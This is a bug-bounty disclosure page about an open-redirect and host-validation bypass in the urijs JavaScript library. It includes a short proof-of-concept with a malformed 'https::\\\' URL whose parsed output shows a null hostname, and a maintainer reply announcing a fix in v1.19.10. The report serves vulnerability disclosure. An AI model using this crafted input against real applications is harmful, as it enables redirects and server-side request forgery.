Open Redirect in medialize/uri.js
Valid
Reported on
Mar 1st 2022
Description
bypass https://huntr.dev/bounties/f53d5c42-c108-40b8-917d-9dad51535083/ urijs fix CVE-2022-0613 , however attacker can bypass to exploit this issue
Proof of Concept
// PoC.js
var URI = require('urijs');
var url = new URI("https::\\\github.com/foo/bar");
console.log(url);
output:
URI {
_string: '',
_parts: {
protocol: 'https',
username: null,
password: null,
hostname: null,
urn: null,
port: null,
path: '/github.com/foo/bar',
query: null,
fragment: null,
preventInvalidHostname: false,
duplicateQueryParameters: false,
escapeQuerySpace: true
},
_deferred_build: true
}
Impact
Bypass host-validation checks, open redirect, SSRF etc. - depends on the usage of urijs
We are processing your report and will contact the
medialize/uri.js
team within 24 hours.
a year ago
huydoppa modified the report
a year ago
We have contacted a member of the
medialize/uri.js
team and are waiting to hear back
a year ago
huydoppa modified the report
a year ago
We have sent a
follow up to the
medialize/uri.js
team.
We will try again in 7 days.
a year ago
thanks for pointing this out! I've released a new version that deals with excessive colons: https://github.com/medialize/URI.js/releases/tag/v1.19.10
The fix bounty has been dropped
This vulnerability will not receive a CVE
https://huntr.dev/bounties/82ef23b8-7025-49c9-b5fc-1bb9885788e5/
to join this conversation